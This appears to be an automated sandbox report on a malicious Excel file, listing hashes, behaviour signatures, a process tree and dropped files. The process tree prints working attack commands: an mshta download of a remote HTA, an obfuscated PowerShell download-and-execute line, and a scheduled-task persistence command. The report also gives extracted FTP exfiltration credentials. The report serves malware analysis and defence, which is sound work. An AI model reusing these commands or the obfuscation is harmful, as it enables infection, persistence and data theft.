Overview

overview

10

Static

static

8

Microsoft_...t3.xls

windows7-x64

10

Microsoft_...t3.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    132s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2022 08:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Microsoft_Excel_97-2003_Worksheet3.xls

  • Size

    36KB

  • MD5

    4e5efb8250aa5094deb1dc99e5786830

  • SHA1

    42124e78ce95be3600258770a002ae01f5e70652

  • SHA256

    0fefe416888a41939d0d7143846844edac1b4ee1ea5fd8f98a893ade7a62d34f

  • SHA512

    cdba63c4ee4620e85b0af3c08911e237bf0b373187efcad9983d2d6bd9aa5238283ef08ba12e00c04ac4bbb41aa10008ce68a984be70de24d86ee3e6ac2c167d

  • SSDEEP

    768:1pz9l7Vbta45G/d9K1EghHsYwiSLSpO7Zp:1pzPzzWdqEghCiKTt

Score
10/10
collection

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    107.182.129.168
  • Port:
    21
  • Username:
    jhfjhjgfh1
  • Password:
    djfhdjfhdf

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 50 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Microsoft_Excel_97-2003_Worksheet3.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2256
    • C:\Windows\SYSTEM32\rundll32.exe
      rundll32 SHELL32.DLL,ShellExec_RunDLL "mshta" "https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file"
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" "https://www.mediafire.com/file/6vip6utwodclo5k/1.htm/file"
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3320
        • C:\Windows\System32\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (I'r'M('https://www.mediafire.com/file/js9o7zmm8jxypb0/1.txt/file') -useB) | .('{欠}{吗}'.replace('吗','0').replace('欠','1')-f'你','疯').replace('疯','I').replace('你','EX') | ping 127.你疯了.你疯了.1
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4708
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            5⤵
            • Drops file in Drivers directory
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • outlook_office_path
            • outlook_win_path
            PID:408
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:3972
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
              dw20.exe -x -s 776
              6⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious use of AdjustPrivilegeToken
              PID:4408
          • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
            "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4236
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
              dw20.exe -x -s 756
              6⤵
              • Drops file in Windows directory
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious use of AdjustPrivilegeToken
              PID:4452
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w1w2ox34\w1w2ox34.cmdline"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4776
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES700.tmp" "c:\Users\Admin\AppData\Local\Temp\w1w2ox34\CSCA78577D31D6949C59D8733FD13CC86EA.TMP"
              6⤵
                PID:4604
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4ekyw1g\s4ekyw1g.cmdline"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4464
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES241D.tmp" "c:\Users\Admin\AppData\Local\Temp\s4ekyw1g\CSCD220EE8F176D47A7BABD7B5E7AF78E.TMP"
                6⤵
                  PID:4288
              • C:\Windows\system32\PING.EXE
                "C:\Windows\system32\PING.EXE" 127.你疯了.你疯了.1
                5⤵
                • Runs ping.exe
                PID:940
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 73 /tn micsrssowfwWorsald /F /tr """Mshta""""""http://www.webclientservices.co.uk/p/1.html"""
              4⤵
              • Creates scheduled task(s)
              PID:1428

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\Microsoft\Windows\WER\Temp\WER6310.tmp.xml
        Filesize

        4KB

        MD5

        fcb8d8d6d4704f183855e4ce9f7c6a18

        SHA1

        7369d2d6f85f38760791628cdc2003125ebf7ba7

        SHA256

        6b211e8abf752cc65fdea511bb70ff97dd4eb165862a6bc4f374a78b2c8937f3

        SHA512

        6d8276cd85f4bc7d1f305b49b1dcec3cd7f528b42b1a7aa6182ce2bc2e632279e5640511e2392fad059ea1a20fe67911224b068ea050d4804ee548ba5eb3c8a5

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES241D.tmp
        Filesize

        1KB

        MD5

        77bdbe7dc2f84a9caf1ca7c2398fbbeb

        SHA1

        c1214f5f598789406e2408ad0b6f7324028a7f04

        SHA256

        9e29e14b4ebaf2afa78d015b404205b7bcfe9a1bd829bace3233af7d803cbe2a

        SHA512

        2c9fa615d7258aac2321d078d4c45da8ba48b494e4d9ed7f1ab863a7a0a72c794bbdeb449139ba2bc4ea55ae8118caf280f2dd1a20fff6d855aa0e3b8626b547

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES700.tmp
        Filesize

        1KB

        MD5

        623fdc6420e796b37aa50ef8025429bd

        SHA1

        2d846451d879d0e4df2309a50f79c5f80e256c1e

        SHA256

        314d243a84978e71753a686cde10607941c47a6eac91b91fea2461b7fade51a7

        SHA512

        6a2ce084da01ce8d4a7684dc382f8d7a482df8c131444103930e70f49a1afc27a242bf6d9172aee135eb97f3bff283093ac5751a8750e8d0163e647096e9f52d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\s4ekyw1g\s4ekyw1g.dll
        Filesize

        3KB

        MD5

        ae024aec023564cb1b8fe9325600ea55

        SHA1

        6318aa999d81a2dfbcc09bb0b41a188c1d588fb1

        SHA256

        2ee0bb5565ba8cb8d081b27d98f3254898b9c7a2cbf4b4804feafecb2a14f48a

        SHA512

        4681ee2273b53af707484ae899d0229fe9d26248dc5b6a73daf5ae9d54cae03c8b71042c7ede38131458982a77ae49666e6c9576e85e6a0fd191c239d2d3ca3a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\w1w2ox34\w1w2ox34.dll
        Filesize

        3KB

        MD5

        a489e66311e1e9d4094f5aed3d7bfa95

        SHA1

        93fd215e7900be82f90fd53247a0317a4b15e6d4

        SHA256

        5d825b299ee1830ad82bc23b0cabfc70c5c5fbe1f643091c5871b6aa5af6650c

        SHA512

        a201bb135f1aa9ea3db6a9edc3dfd0f1b65a176e049088766cc1354fcba94a43fabb31daa9d06065807adaf09890e99ff1157b046ed7268ebcde919f9fdc5c1f

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\s4ekyw1g\CSCD220EE8F176D47A7BABD7B5E7AF78E.TMP
        Filesize

        652B

        MD5

        834dc921fe86ce9ede4ec7ab0fc356ce

        SHA1

        4beb389ce2a4e0d8e45fe261665fdbb21ae807f0

        SHA256

        2aa51062867a8d7e820a014a36a37535565760d943d4aecf0726687c8dd394fd

        SHA512

        6d6b269a65a331408c93af78285ee929c5111452e5c089acaa851cfe229333a250db0cb45903b3108dfa4ebc9fcc0f65c6391edacc62e357c3c50d6f453b6898

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\s4ekyw1g\s4ekyw1g.0.cs
        Filesize

        424B

        MD5

        5b0a710c68952a280e3737f249a789bb

        SHA1

        cfd4349b3ebe8232b342fa6667e63d8027fcd26b

        SHA256

        32781e50bffd54bf50e075fc3c5fea9bf02030c8aeb34344cf15592d702973ad

        SHA512

        37efadb9ecade74d0f57bf0c5f5ff254203f952a7b54443433dadbc1e720d294ac6e3694a016520b99747a9856dc523d8a901f209285dba53863dd2e3e64e8ad

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\s4ekyw1g\s4ekyw1g.cmdline
        Filesize

        369B

        MD5

        14e5972c4050a59e4395a471aedbae87

        SHA1

        748c01f74cad53f9701f0c3c802f3888a1b039dd

        SHA256

        3be1a8b65718de504ed371045c65915a8f709f61e044ad9662983aa79723360d

        SHA512

        ef8bb309741f855a9dd9a3a854912cc0bc284c584e45c80888303b789c2dc46b701bd9b5945898e5e975e00a4402c06b6671ac8bc31c12375094f4ea8d8f788b

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\w1w2ox34\CSCA78577D31D6949C59D8733FD13CC86EA.TMP
        Filesize

        652B

        MD5

        0f0ff7053ceae7157622c139f6a15a13

        SHA1

        9c6a7ca922012127a3bebd0af74a28ba93b151ab

        SHA256

        12de55832cca1b33975bccfe2d4182d8d543a0ecb3e99f086e15037df8a5618f

        SHA512

        f8a9b723c213d241ca74cf734e17d9edc9091c8263bfa01fe6d9d6308ace1345c75b766bc2998ca3d9a2523a70be0a6c2f455c8cf93b425f78173abb85efb4fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\w1w2ox34\w1w2ox34.0.cs
        Filesize

        424B

        MD5

        d05db7ca65c16470a87f4c4007e9e026

        SHA1

        ab4a5e6b4fbc331c345d88c39239f003f8dd3da7

        SHA256

        c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960

        SHA512

        825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\w1w2ox34\w1w2ox34.cmdline
        Filesize

        369B

        MD5

        0e56854db396d3b40b7d7d89130d579b

        SHA1

        ca141e65ba2813fc1e62d9f08cb34148ade253da

        SHA256

        ba0b2ecc60473bddbc5e8da50813127d7c6dda2c507ddedee0c1e2a659e9200c

        SHA512

        6b91f5f2654174ad4a4e53a1a26e1c8b5313bdc8d487f1de0dc091434f1c36dcf3ee6c7ab691f8b7c9d1530fb19f68074950d05229025978a4d3c1de5688d1f1

        Download Submit

      • memory/220-143-0x0000000000000000-mapping.dmp

        Download

      • memory/408-161-0x0000000004EE0000-0x0000000004F7C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/408-166-0x0000000006260000-0x00000000062B0000-memory.dmp

        Filesize

        320KB

        Download

      • memory/408-167-0x0000000006730000-0x000000000673A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/408-163-0x0000000005140000-0x00000000051A6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/408-149-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

        Download

      • memory/408-150-0x000000000047D6CE-mapping.dmp

        Download

      • memory/408-162-0x00000000050A0000-0x0000000005132000-memory.dmp

        Filesize

        584KB

        Download

      • memory/408-160-0x00000000053F0000-0x0000000005994000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/940-183-0x0000000000000000-mapping.dmp

        Download

      • memory/1428-145-0x0000000000000000-mapping.dmp

        Download

      • memory/2256-188-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-137-0x00007FF85A490000-0x00007FF85A4A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-134-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-187-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-132-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-138-0x00007FF85A490000-0x00007FF85A4A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-186-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-133-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-136-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-139-0x0000016497670000-0x0000016497674000-memory.dmp

        Filesize

        16KB

        Download

      • memory/2256-189-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2256-135-0x00007FF85CAD0000-0x00007FF85CAE0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2396-140-0x0000000000000000-mapping.dmp

        Download

      • memory/3320-141-0x0000000000000000-mapping.dmp

        Download

      • memory/3972-165-0x0000000074130000-0x00000000746E1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/3972-157-0x0000000074130000-0x00000000746E1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/3972-152-0x000000000047D6CE-mapping.dmp

        Download

      • memory/4236-168-0x0000000074130000-0x00000000746E1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/4236-154-0x000000000047D6CE-mapping.dmp

        Download

      • memory/4236-156-0x0000000074130000-0x00000000746E1000-memory.dmp

        Filesize

        5.7MB

        Download

      • memory/4288-179-0x0000000000000000-mapping.dmp

        Download

      • memory/4408-158-0x0000000000000000-mapping.dmp

        Download

      • memory/4452-159-0x0000000000000000-mapping.dmp

        Download

      • memory/4464-176-0x0000000000000000-mapping.dmp

        Download

      • memory/4604-172-0x0000000000000000-mapping.dmp

        Download

      • memory/4708-184-0x00007FF870440000-0x00007FF870F01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4708-146-0x000001E92EBA0000-0x000001E92EBC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4708-155-0x00007FF870440000-0x00007FF870F01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4708-144-0x0000000000000000-mapping.dmp

        Download

      • memory/4708-148-0x000001E92F420000-0x000001E92F5E2000-memory.dmp

        Filesize

        1.8MB

        Download

      • memory/4708-147-0x00007FF870440000-0x00007FF870F01000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4776-169-0x0000000000000000-mapping.dmp

        Download